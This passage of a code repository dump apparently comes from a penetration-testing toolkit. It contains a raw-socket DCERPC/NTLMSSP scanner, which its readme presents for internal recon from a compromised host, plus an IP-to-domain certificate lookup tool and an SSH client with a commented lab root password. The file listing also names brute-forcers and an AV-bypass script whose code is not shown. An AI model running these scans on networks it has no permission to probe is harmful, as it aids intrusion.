├── Dcerpc_Find_OSInfo ├── Dcerpc_Find_OSInfo.py ├── Readme.md └── images │ ├── 640-16432009920046-16444876053855.webp │ ├── 640-16432009920047-16444876053866.webp │ ├── Z2Oqq二维码4-16814031792311.jpg │ ├── Z2Oqq二维码4.jpg │ ├── Z2O安全攻防交流②群群聊二维码-16814031792322.png │ ├── Z2O安全攻防交流②群群聊二维码.png │ ├── Z2O安全攻防交流群群聊qq二维码.png │ ├── image-20220427110933992.png │ ├── image-20220427111016139.png │ ├── image-20220527180040876.png │ ├── image-20220528161243239.png │ ├── image-20220528185933039.png │ ├── image-20220528193253307.png │ ├── image-20230414002829568.png │ └── 公众号.jpg ├── Ip2domain ├── images │ ├── 640-16432009920046-16444876053855.webp │ ├── 640-16432009920047-16444876053866.webp │ ├── Z2O安全攻防交流群群聊qq二维码.png │ ├── image-20220427110933992.png │ ├── image-20220427111016139.png │ ├── image-20220612125013941.png │ ├── image-20220612175433669.png │ ├── image-20220612181909329.png │ ├── 公众号.jpg │ └── 微信图片_20220427110850.jpg ├── ip2domain.py └── readme.md ├── MyInteractive_SSH.py ├── MyMultithreadPing.py ├── MyNointeractive_SSH.py ├── MyNslookup.py ├── MyNslookup2.py ├── My_dirscan.py ├── Mybruster.py ├── Mybruster_SNMP 函数版.py ├── Mybruster_SSH.py ├── Mybruster_ftp 函数版.py ├── Mybruster_phpmyadmin.py ├── Mybruster_phpmyadmin单线程版.py ├── MybypassAV_ps1.py ├── MybypassAV_ps1初版.py ├── Myportscan.py ├── Myportscan2.py ├── Myportscan单线程函数版.py ├── Myportscan端口扫描 扫描封装到类单线程版本.py ├── Myportscan端口探测封装到类版.py ├── Mywebscan.py ├── images ├── 640-16432009920046.webp ├── 640-16432009920047.webp ├── 640-16432009920048.webp ├── Z2O安全攻防交流群群聊qq二维码.png ├── image-20220427111016139.png ├── 公众号.jpg └── 微信图片_20220427110850.jpg └── readme.md /Dcerpc_Find_OSInfo/Dcerpc_Find_OSInfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Author:Komomon 4 | # @Time:2022/5/27 17:32 5 | 6 | ''' 7 | 完整版 8 | 通过DCERPC+NTLMSSP探测目标主机信息 9 | 10 | usage 11 | python3 Dcerpc_Find_OSInfo.py -i 192.168.31 12 | python3 Dcerpc_Find_OSInfo.py -i ip.txt 13 | python3 Dcerpc_Find_OSInfo.py -i 192.168.1.1-192.168.2.2 14 | 15 | 16 | ''' 17 | 域控原本IP 18 | from base64 import b64encode 19 | from argparse import ArgumentParser, FileType 20 | from queue import Queue 21 | from threading import Thread 22 | import sys 23 | import socket 24 | import logging 25 | import binascii, time 26 | 27 | TIME_OUT = 3 28 | RESULT_LIST = [] 29 | length = 0 30 | 31 | 32 | def get_ip_list(ip) -> list: 33 | ip_list = [] 34 | iptonum = lambda x: sum([256 ** j * int(i) for j, i in enumerate(x.split('.')[::-1])]) 35 | numtoip = lambda x: '.'.join([str(int(x / (256 ** i)) % 256) for i in range(3, -1, -1)]) 36 | if '-' in ip: 37 | ip_range = ip.split('-') 38 | ip_start = int(iptonum(ip_range[0])) 39 | ip_end = int(iptonum(ip_range[1])) 40 | ip_count = ip_end - ip_start 41 | if ip_count >= 0 and ip_count <= 65536: 42 | for ip_num in range(ip_start, ip_end + 1): 43 | ip_list.append(numtoip(ip_num)) 44 | else: 45 | print('-i wrong format') 46 | 47 | elif '.txt' in ip: 48 | ip_config = open(ip, 'r') 49 | for ip in ip_config: 50 | ip_list.extend(get_ip_list(ip.strip())) 51 | ip_config.close() 52 | else: 53 | ip_split = ip.split('.') 54 | net = len(ip_split) 55 | if net == 2: 56 | for b in range(1, 255): 57 | for c in range(1, 255): 58 | ip = "%s.%s.%d.%d" % (ip_split[0], ip_split[1], b, c) 59 | ip_list.append(ip) 60 | elif net == 3: 61 | for c in range(1, 255): 62 | ip = "%s.%s.%s.%d" % (ip_split[0], ip_split[1], ip_split[2], c) 63 | ip_list.append(ip) 64 | elif net == 4: 65 | ip_list.append(ip) 66 | else: 67 | print("-i wrong format") 68 | 69 | return ip_list 70 | 71 | 72 | def attribute_name(Target_Info_bytes): 73 | global length 74 | att_name_length = int.from_bytes(Target_Info_bytes[length + 2:length + 4], byteorder='little') 75 | att_name = Target_Info_bytes[length + 4:length + 4 + att_name_length].replace(b"\x00", b"").decode( 76 | encoding="unicode_escape") 77 | length = length + 4 + att_name_length 78 | return att_name 79 | 80 | 81 | def send_packet(ip): 82 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 83 | try: 84 | sock.settimeout(TIME_OUT) 85 | sock.connect((ip, 135)) 86 | buffer_v1 = b"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa\x03\x00\x00\x00\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36\x01\x00\x00\x00" 87 | sock.send(buffer_v1) 88 | packet1 = sock.recv(1024) 89 | digit = "x86" 90 | if b"\x33\x05\x71\x71\xBA\xBE\x37\x49\x83\x19\xB5\xDB\xEF\x9C\xCC\x36" in packet1: 91 | digit = "x64" 92 | return digit 93 | except Exception as e: 94 | # print(e) 95 | return -1 96 | finally: 97 | sock.close() 98 | 99 | 100 | def get_osinfo(ip): 101 | global length 102 | osinfo = { 103 | "NetBIOS_domain_name": "", 104 | "DNS_domain_name": "", 105 | "DNS_computer_name": "", 106 | "DNS_tree_name": "", 107 | } 108 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 109 | try: 110 | sock.settimeout(TIME_OUT) 111 | sock.connect((ip, 135)) 112 | buffer_v2 = b"\x05\x00\x0b\x03\x10\x00\x00\x00\x78\x00\x28\x00\x03\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x01\x00\xa0\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00\x0a\x02\x00\x00\x00\x00\x00\x00\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x01\xb1\x1d\x00\x00\x00\x0f" 113 | sock.send(buffer_v2) 114 | packet2 = sock.recv(4096) 115 | digit = send_packet(ip) 116 | OS_Version_bytes = packet2[int('0xa0', 16) - 54 + 10:int('0xa0', 16) - 54 + 18] 117 | Major_Version = int.from_bytes(OS_Version_bytes[0:1], byteorder='little') 118 | Minor_Version = int.from_bytes(OS_Version_bytes[1:2], byteorder='little') 119 | Build_Number = int.from_bytes(OS_Version_bytes[2:4], byteorder='little') 120 | NTLM_Current_Reversion = int.from_bytes(OS_Version_bytes[7:8], byteorder='little') 121 | OS_Verison = "Windows Version {0}.{1} Build {2} {3}".format(Major_Version, Minor_Version, Build_Number, digit) 122 | 123 | Target_Info_Length_bytes = packet2[int('0xa0', 16) - 54 + 2:int('0xa0', 16) - 54 + 4] 124 | Target_Info_Length = int.from_bytes(Target_Info_Length_bytes, byteorder='little') 125 | Target_Info_bytes = packet2[-Target_Info_Length:-4] # 最后四个0x00000000 126 | print("[*] " + ip) 127 | print("\t[->]", "OS_Verison :", OS_Verison) 128 | for k in osinfo.keys(): 129 | osinfo[k] = attribute_name(Target_Info_bytes) 130 | print("\t[->]", k, ":", osinfo[k]) 131 | length = 0 132 | osinfo["OS_Verison"] = OS_Verison 133 | result = {ip: osinfo} 134 | return result 135 | except Exception as e: 136 | return -1 137 | finally: 138 | sock.close() 139 | 140 | 141 | def worker(q): 142 | while True: 143 | try: 144 | data = q.get() 145 | result = get_osinfo(data) 146 | if result != -1: 147 | RESULT_LIST.append(result) 148 | except Exception as e: 149 | sys.stderr.write(str(e)) 150 | finally: 151 | q.task_done() 152 | 153 | 154 | def main(): 155 | parser = ArgumentParser() 156 | parser.add_argument('-i', '--ip', help=u'IP Address', required=True) 157 | parser.add_argument('-t', '--threads', help=u'threads', default=20, type=int) 158 | parser.add_argument('-o', '--output', help=u'Output result', default='log.txt', type=FileType('a+')) 159 | 160 | args = parser.parse_args() 161 | if args.ip is None: 162 | print("Some Wrong.") 163 | q = Queue(args.threads) 164 | 165 | for _ in range(args.threads): 166 | t = Thread(target=worker, args=(q,)) 167 | t.daemon = True 168 | t.start() 169 | 170 | ip_list = get_ip_list(args.ip) 171 | for i in ip_list: 172 | q.put(i) 173 | q.join() 174 | for osinfo_dict in RESULT_LIST: 175 | for ip in osinfo_dict.keys(): 176 | args.output.write("[*] " + ip + "\n") 177 | for k, v in osinfo_dict[ip].items(): 178 | args.output.write("\t[->] " + k + ":" + v + "\n") 179 | # print(osinfo_dict) 180 | 181 | 182 | if __name__ == '__main__': 183 | main() 184 | -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/Readme.md: -------------------------------------------------------------------------------- 1 | # 通过dcerpc和ntlmssp获取Windows远程主机信息 2 | 3 | **欢迎star:star: O(∩_∩)O** 4 | 5 | ## 成果 6 | 7 | 首先看一下成果,通过DCERPC协议的ping附带NTLMSSP 可以获取到目标的版本号主机名,域名,DNS等信息。 8 | 9 | ![image-20220528193253307](images/image-20220528193253307.png) 10 | 11 | 12 | 13 | ## 初衷 14 | 15 | 想自己实现一下,,同时因为通过rpc进行探测的工具,大部分都是依托impacket来实现,而实战中通过挂代理进行内网探测速率和准确度都比较低,所以最好的方法是将脚本放到目标主机上,来进行内网探测信息收集,所以本文关注的点是想办法脱离impacket,在Socket RAW上的实现,这样能够减小工具的体积,并且其他语言也能够轻松复刻整个过程,便于应用到实战中。 16 | 17 | ## 协议介绍-RPC 18 | 19 | RPC(Remote Procedure Call)远程过程调用协议,一种通过网络从远程计算机上请求服务,而不需要了解底层网络技术的协议。RPC它假定某些协议的存在,例如TCP/UDP等,为通信程序之间携带信息数据。在OSI网络七层模型中,RPC跨越了传输层和应用层,RPC使得开发,包括网络分布式多程序在内的应用程序更加容易。 20 | 21 | ## 原理 22 | 23 | 通过DCERPC协议的ping附带NTLMSSP则目标会在响应包中包含自己的版本号,主机名,域名,DNS等信息。 24 | 25 | **域内主机:** 26 | 27 | ![image-20220527180040876](images/image-20220527180040876.png) 28 | 29 | **工作组主机:** 30 | 31 | ![image-20220528161243239](images/image-20220528161243239.png) 32 | 33 | 34 | 35 | 36 | 37 | ## 写成脚本 38 | 39 | 根据上面的分析,写成了多线程的脚本, 多线程实现扫描效果如下: 40 | 41 | ![image-20220528193253307](images/image-20220528193253307.png) 42 | 43 | 域内主机的话会显示域名,主机名,操作系统版本架构等信息,工作组主机则信息都是自己的主机名。 44 | 45 | 46 | 47 | ## Usage 48 | 49 | ![image-20220528185933039](images/image-20220528185933039.png) 50 | 51 | ```java 52 | python3 Dcerpc_Find_OSInfo.py -i 192.168.31 53 | python3 Dcerpc_Find_OSInfo.py -i ip.txt 54 | python3 Dcerpc_Find_OSInfo.py -i 192.168.1.1-192.168.2.2 55 | python3 Dcerpc_Find_OSInfo.py -i 192.168.1.1-192.168.2.2 -t 20 # 默认线程15,默认将结果输出到log.txt 56 | python3 Dcerpc_Find_OSInfo.py -i 192.168.1.1-192.168.2.2 -t 20 -o result.txt 57 | ``` 58 | 59 | 60 | 61 | ## 一起交流 62 | 63 | 感兴趣的可以关注 **Z2O安全攻防** 公众号回复“**加群**”,添加Z2OBot 小K自动拉你加入**Z2O安全攻防交流群**分享更多好东西。 64 | 65 | ![image-20220427110933992](images/image-20220427110933992.png) 66 | 67 | ![公众号](images/公众号.jpg) 68 | 69 | **知识星球** 70 | 71 | 团队建立了知识星球,不定时更新最新漏洞复现,手把手教你,同时不定时更新POC、内外网渗透测试骚操作。感兴趣的可以加一下。 72 | 73 | ![image-20220427111016139](images/image-20220427111016139.png) 74 | 75 | ![图片](images/640-16432009920046-16444876053855.webp) 76 | 77 | ![图片](images/640-16432009920047-16444876053866.webp) 78 | 79 | ![image-20230414002829568](images/image-20230414002829568.png) 80 | 81 | ![Z2Oqq二维码4](images/Z2Oqq二维码4-16814031792311.jpg) 82 | 83 | **欢迎star:star: O(∩_∩)O** 84 | 85 | 86 | 87 | -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/640-16432009920046-16444876053855.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/640-16432009920046-16444876053855.webp -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/640-16432009920047-16444876053866.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/640-16432009920047-16444876053866.webp -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/Z2Oqq二维码4-16814031792311.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/Z2Oqq二维码4-16814031792311.jpg -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/Z2Oqq二维码4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/Z2Oqq二维码4.jpg -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/Z2O安全攻防交流②群群聊二维码-16814031792322.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/Z2O安全攻防交流②群群聊二维码-16814031792322.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/Z2O安全攻防交流②群群聊二维码.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/Z2O安全攻防交流②群群聊二维码.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/Z2O安全攻防交流群群聊qq二维码.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/Z2O安全攻防交流群群聊qq二维码.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220427110933992.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220427110933992.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220427111016139.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220427111016139.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220527180040876.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220527180040876.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220528161243239.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220528161243239.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220528185933039.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220528185933039.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220528193253307.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220528193253307.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20230414002829568.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20230414002829568.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/公众号.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/公众号.jpg -------------------------------------------------------------------------------- /Ip2domain/images/640-16432009920046-16444876053855.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/640-16432009920046-16444876053855.webp -------------------------------------------------------------------------------- /Ip2domain/images/640-16432009920047-16444876053866.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/640-16432009920047-16444876053866.webp -------------------------------------------------------------------------------- /Ip2domain/images/Z2O安全攻防交流群群聊qq二维码.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/Z2O安全攻防交流群群聊qq二维码.png -------------------------------------------------------------------------------- /Ip2domain/images/image-20220427110933992.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/image-20220427110933992.png -------------------------------------------------------------------------------- /Ip2domain/images/image-20220427111016139.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/image-20220427111016139.png -------------------------------------------------------------------------------- /Ip2domain/images/image-20220612125013941.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/image-20220612125013941.png -------------------------------------------------------------------------------- /Ip2domain/images/image-20220612175433669.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/image-20220612175433669.png -------------------------------------------------------------------------------- /Ip2domain/images/image-20220612181909329.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/image-20220612181909329.png -------------------------------------------------------------------------------- /Ip2domain/images/公众号.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/公众号.jpg -------------------------------------------------------------------------------- /Ip2domain/images/微信图片_20220427110850.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/微信图片_20220427110850.jpg -------------------------------------------------------------------------------- /Ip2domain/ip2domain.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import datetime 3 | import socket 4 | import ssl 5 | import threading 6 | from queue import Queue 7 | import os 8 | import OpenSSL.crypto as crypto 9 | import re 10 | 11 | 12 | class Handle_Data: 13 | def __init__(self, queue=None, file=None, outputfile=None): 14 | self.queue = queue 15 | self.file = file 16 | self.outputfile = outputfile 17 | 18 | def producer(self): 19 | with open(self.file, 'r') as f: 20 | for line in f.readlines(): 21 | ll = line.strip() 22 | if ll is not None: 23 | self.queue.put(ll) 24 | 25 | def handle_data(self, line, outputfile=None): 26 | 27 | ipstr = re.findall(r'\b(?:\d{1,3}\.){3}\d{1,3}:?\d{0,5}\b', line) 28 | if len(ipstr) != 0: 29 | if ":" in line: 30 | ip, port = ipstr[0].split(":", 1) 31 | else: 32 | ip = ipstr[0] 33 | port = 443 34 | try: 35 | dst = (ip, int(port)) 36 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 37 | s.settimeout(1) 38 | s.connect(dst) 39 | 40 | ctx = ssl.create_default_context() 41 | ctx.check_hostname = False 42 | ctx.verify_mode = ssl.CERT_NONE 43 | s = ctx.wrap_socket(s, server_hostname=dst[0]) 44 | 45 | # get certificate 46 | cert_bin = s.getpeercert(True) 47 | x509 = crypto.load_certificate(crypto.FILETYPE_ASN1, cert_bin) 48 | msg = "IP : " + str(ip) + " || Cert name: " + x509.get_subject().CN + "" 49 | 50 | except socket.error: 51 | msg = "IP : " + str(ip) + " || No cert" 52 | else: 53 | msg = "Domain: " + line + " || No cert" 54 | print(msg) 55 | if outputfile is not None: 56 | with open(outputfile, "a", encoding="utf-8") as g: 57 | g.write(msg + "\n") 58 | 59 | def start(self): 60 | while not self.queue.empty(): 61 | # while True: 62 | line = self.queue.get() 63 | self.handle_data(line, self.outputfile) 64 | 65 | 66 | def iter_count(file_name): 67 | from itertools import (takewhile, repeat) 68 | buffer = 1024 * 1024 69 | with open(file_name) as f: 70 | buf_gen = takewhile(lambda x: x, (f.read(buffer) for _ in repeat(None))) 71 | return sum(buf.count('\n') for buf in buf_gen) 72 | 73 | 74 | if __name__ == '__main__': 75 | logo = """ 76 | 77 | ██▓ ██▓███ ▓█████▄ ▒█████ ███▄ ▄███▓ ▄▄▄ ██▓ ███▄ █ 78 | ▓██▒▓██░ ██▒ ▒██▀ ██▌▒██▒ ██▒▓██▒▀█▀ ██▒▒████▄ ▓██▒ ██ ▀█ █ 79 | ▒██▒▓██░ ██▓▒ ░██ █▌▒██░ ██▒▓██ ▓██░▒██ ▀█▄ ▒██▒▓██ ▀█ ██▒ 80 | ░██░▒██▄█▓▒ ▒ ░▓█▄ ▌▒██ ██░▒██ ▒██ ░██▄▄▄▄██ ░██░▓██▒ ▐▌██▒ 81 | ░██░▒██▒ ░ ░ ░▒████▓ ░ ████▓▒░▒██▒ ░██▒ ▓█ ▓██▒░██░▒██░ ▓██░ 82 | ░▓ ▒▓▒░ ░ ░ ▒▒▓ ▒ ░ ▒░▒░▒░ ░ ▒░ ░ ░ ▒▒ ▓▒█░░▓ ░ ▒░ ▒ ▒ 83 | ▒ ░░▒ ░ ░ ▒ ▒ ░ ▒ ▒░ ░ ░ ░ ▒ ▒▒ ░ ▒ ░░ ░░ ░ ▒░ 84 | ▒ ░░░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ░ 85 | ░ ░ ░ ░ ░ ░ ░ ░ ░ 86 | ░ By Komomon 87 | """ 88 | 89 | print(logo) 90 | ttime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S') 91 | usage = """ 92 | python3 {0} -f file.txt 93 | """.format(os.path.basename(__file__)) 94 | parser = argparse.ArgumentParser(usage=usage) 95 | parser.add_argument("-f", "--file", default=None, dest="file", help="the url file") 96 | parser.add_argument("-o", "--output", default=ttime + "_result.txt", dest="output", help="the result file") 97 | parser.add_argument("-t", "--thread", type=int, default=10, dest="threads", help="Threads num, defalut 10") 98 | args = parser.parse_args() 99 | file = args.file 100 | outputfile = args.output 101 | Thread_maxnum = args.threads 102 | print("[+] {0} starting...".format(ttime)) 103 | 104 | if file != None: 105 | lines = iter_count(file) 106 | if lines < Thread_maxnum: 107 | Thread_maxnum = lines 108 | URL_QUEUE = Queue() 109 | thread_list = [] 110 | Object = Handle_Data(queue=URL_QUEUE, file=file, outputfile=outputfile) 111 | 112 | print("[+] Threads num:", Thread_maxnum) 113 | thread = threading.Thread(target=Object.producer) 114 | thread_list.append(thread) 115 | # thread.start() 116 | for i in range(Thread_maxnum): 117 | thread = threading.Thread(target=Object.start) 118 | thread_list.append(thread) 119 | for thread in thread_list: 120 | thread.start() 121 | for thread in thread_list: 122 | thread.join() 123 | else: 124 | print("Please use -h see usage!") 125 | exit(1) 126 | ttime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S') 127 | print("[+] result: {0}".format(outputfile)) 128 | print("[+] {0} finished!".format(ttime)) 129 | -------------------------------------------------------------------------------- /Ip2domain/readme.md: -------------------------------------------------------------------------------- 1 | # ip2domain 2 | 3 | 通过ssl证书,批量ip反查域名工具。 4 | 5 | ## Usage 6 | 7 | ``` 8 | usage: 9 | python3 ip2domain.py -f file.txt 10 | 11 | 12 | optional arguments: 13 | -h, --help show this help message and exit 14 | -f FILE, --file FILE the url file 15 | -o OUTPUT, --output OUTPUT 16 | the result file 17 | -t THREADS, --thread THREADS 18 | Threads num, defalut 10 19 | ``` 20 | 21 | 文件内容格式: 22 | 23 | ``` 24 | 121.40.43.188 25 | 121.40.43.188 26 | 121.40.43.189:8080 27 | www.cnblogs.com 28 | ``` 29 | 30 | 31 | 32 | ![image-20220612175433669](images/image-20220612175433669.png) 33 | 34 | 默认结果存储到当前时间的txt文件中 35 | 36 | ![image-20220612181909329](images/image-20220612181909329.png) 37 | 38 | ![image-20220612125013941](images/image-20220612125013941.png) 39 | 40 | ## 一起交流 41 | 42 | 感兴趣的可以关注 **Z2O安全攻防** 公众号回复“**加群**”,添加Z2OBot 小K自动拉你加入**Z2O安全攻防交流群**分享更多好东西。 43 | 44 | ![image-20220427110933992](images/image-20220427110933992.png) 45 | 46 | ![公众号](images/公众号.jpg) 47 | 48 | ![Z2O安全攻防交流群群聊qq二维码](images/Z2O安全攻防交流群群聊qq二维码.png) 49 | 50 | 51 | 52 | 团队建立了知识星球,不定时更新最新漏洞复现,手把手教你,同时不定时更新POC、内外网渗透测试骚操作。感兴趣的可以加一下。 53 | 54 | ![image-20220427111016139](images/image-20220427111016139.png) 55 | 56 | ![图片](images/640-16432009920046-16444876053855.webp) 57 | 58 | ![图片](images/640-16432009920047-16444876053866.webp) 59 | 60 | ![微信图片_20220427110850](images/微信图片_20220427110850.jpg) 61 | 62 | 63 | 64 | **欢迎star:star: O(∩_∩)O** -------------------------------------------------------------------------------- /MyInteractive_SSH.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import paramiko 3 | import sys 4 | import time 5 | import platform 6 | import re 7 | 8 | # ip = "192.168.148.128" 9 | # port = "22" 10 | # username = "root" 11 | # password = "981129" 12 | # SSH_CON_TIMEOUT = 10 # SSH连接超时设置10s 13 | RECV_BUFLEN = 32768 # SSH通道recv接收缓冲区大小 14 | MAX_WAIT_OUTPUT = 32 15 | 16 | ''' 17 | 交互式SSH,可以使用cd more 但是vim好像不行 18 | ''' 19 | 20 | 21 | def Interactive_SSH(ip, port, username, password, SSH_CON_TIMEOUT=10): 22 | ssh = paramiko.SSHClient() 23 | try: 24 | print('[-] try login ssh {}@{}:{} .....'.format(username, ip, port)) 25 | # 创建一个ssh的白名单 paramiko.AutoAddPolicy() #目的是接受不在本地Known_host文件下的主机。 26 | # #加载创建的白名单 27 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 28 | # compress 启用压缩 29 | ssh.connect(ip, port=port, username=username, password=password, compress=True, timeout=SSH_CON_TIMEOUT) 30 | print('[+] Login successfully') 31 | print('[+] username:', username, ',password:', password) 32 | channel = ssh.invoke_shell() 33 | channel.settimeout(5) 34 | 35 | while True: 36 | cnt = 0 37 | while not channel.recv_ready(): 38 | time.sleep(0.5) 39 | cnt += 1 40 | if cnt > MAX_WAIT_OUTPUT: 41 | break 42 | result = channel.recv(RECV_BUFLEN) 43 | # print(result.decode().strip(), end='') 44 | printdata(result.decode()) 45 | # sys.stdout.write(result.decode().strip()) 46 | command = sys.stdin.readline() 47 | # print("cmd:", command) 48 | # print(1) 49 | channel.send(command) 50 | except Exception as e: 51 | print("Error:",e) 52 | ssh.close() 53 | 54 | 55 | def printdata(data): 56 | if platform.system() == "Windows": 57 | dataa = re.sub(r'\x1b\[.*?m', '', data, flags=re.M) 58 | print(dataa, end='') 59 | elif platform.system() == "Linux": 60 | print(data, end='') 61 | 62 | 63 | if __name__ == '__main__': 64 | usage = """ 65 | Interactive SSH connection 66 | 67 | """ 68 | parser = argparse.ArgumentParser(usage=usage, description="des") 69 | parser.add_argument("-H", "--host", type=str, dest="host", required=True, help="Hosts to scan") 70 | parser.add_argument("--port", type=int, dest="port", default=22, help="ports to scan") 71 | parser.add_argument("-t", "--timeout", type=int, default=10, dest="timeout", help="Request timeout") 72 | parser.add_argument("-u", "--user", type=str, required=True, dest="username", help="Username") 73 | parser.add_argument("-p", "--pass", type=str, required=True, dest="password", help="Password") 74 | args = parser.parse_args() 75 | 76 | host = args.host 77 | port = args.port 78 | username = args.username 79 | password = args.password 80 | SSH_CON_TIMEOUT = args.timeout 81 | Interactive_SSH(host, port, username, password, SSH_CON_TIMEOUT) 82 | -------------------------------------------------------------------------------- /MyMultithreadPing.py: -------------------------------------------------------------------------------- 1 | import threading 2 | import subprocess 3 | import time 4 | import os 5 | import sys 6 | from queue import Queue 7 | 8 | ''' 9 | 多线程ping 缺少文件参数和线程数量控制参数 10 | ''' 11 | # 定义工作线程 12 | Thread_maxnum = 50 13 | 14 | 15 | # 定义一个执行 ping 的函数 16 | def ping_ip(IP_QUEUE): 17 | while not IP_QUEUE.empty(): 18 | ip = IP_QUEUE.get() 19 | if os.name == 'nt': 20 | res = subprocess.call('ping -n 2 -w 5 %s' % ip, 